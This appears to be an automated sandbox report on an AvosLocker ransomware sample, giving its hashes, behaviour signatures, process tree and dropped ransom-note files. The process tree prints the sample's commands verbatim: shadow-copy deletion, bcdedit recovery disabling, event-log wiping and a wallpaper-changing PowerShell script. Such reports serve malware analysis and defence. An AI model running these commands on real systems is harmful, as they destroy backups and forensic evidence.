Overview

overview

10

Static

static

3

5d6e4bd7bd...fa.exe

windows7-x64

10

5d6e4bd7bd...fa.exe

windows10-2004-x64

10

Resubmissions

11-05-2023 15:49

230511-s9f6zsad87 10

11-05-2023 15:45

230511-s7b49agc64 10

03-05-2023 23:25

230503-3edsgsba4x 10

03-05-2023 11:43

230503-nv3n8aee94 10

Analysis

  • max time kernel
    9s
  • max time network
    60s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-05-2023 23:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

  • Size

    807KB

  • MD5

    1a23dd405a1bd4e488c5fb54f22e14ff

  • SHA1

    73b1d319fb361e591c2e6a65caaea73186f51193

  • SHA256

    5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa

  • SHA512

    b9ff21124e04ec7c9e5159cc7cc8ce1110b35941c7a1235b4bd55911ad17c03ace3ce1173e784e6154b09a6eb21da880b7f54886bda589e6293e69d92337f80b

  • SSDEEP

    12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA:u4s+oT+NXBLi0rjFXvyHBlb4CZa8

Score
10/10
avoslockerevasionransomware

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

    ransomwareavoslocker
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
    "C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1544
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:8104
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:8096
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1492
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:7924
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:7932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
        PID:5072
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1289896251.png /f
          3⤵
            PID:5888
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
            3⤵
              PID:6184
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5344
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:7928
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:4060

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\GET_YOUR_FILES_BACK.txt
          Filesize

          1011B

          MD5

          064348106157ac3e6972ebe6852f665f

          SHA1

          4f95549af4873637f05f5f574b93605d30a28dbb

          SHA256

          876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

          SHA512

          e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          5caad758326454b5788ec35315c4c304

          SHA1

          3aef8dba8042662a7fcf97e51047dc636b4d4724

          SHA256

          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

          SHA512

          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smcebxry.dg5.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
          Filesize

          1011B

          MD5

          064348106157ac3e6972ebe6852f665f

          SHA1

          4f95549af4873637f05f5f574b93605d30a28dbb

          SHA256

          876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

          SHA512

          e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

          Download Submit

        • C:\Users\GET_YOUR_FILES_BACK.txt
          Filesize

          1011B

          MD5

          064348106157ac3e6972ebe6852f665f

          SHA1

          4f95549af4873637f05f5f574b93605d30a28dbb

          SHA256

          876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

          SHA512

          e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

          Download Submit

        • memory/5072-23369-0x000002A943D40000-0x000002A943D50000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5072-23374-0x000002A943D40000-0x000002A943D50000-memory.dmp

          Filesize

          64KB

          Download

        • memory/7932-1140-0x0000020B1CA60000-0x0000020B1CA82000-memory.dmp

          Filesize

          136KB

          Download

        • memory/7932-1411-0x0000020B1BFA0000-0x0000020B1BFB0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/7932-1442-0x0000020B1BFA0000-0x0000020B1BFB0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/7932-1489-0x0000020B1BFA0000-0x0000020B1BFB0000-memory.dmp

          Filesize

          64KB

          Download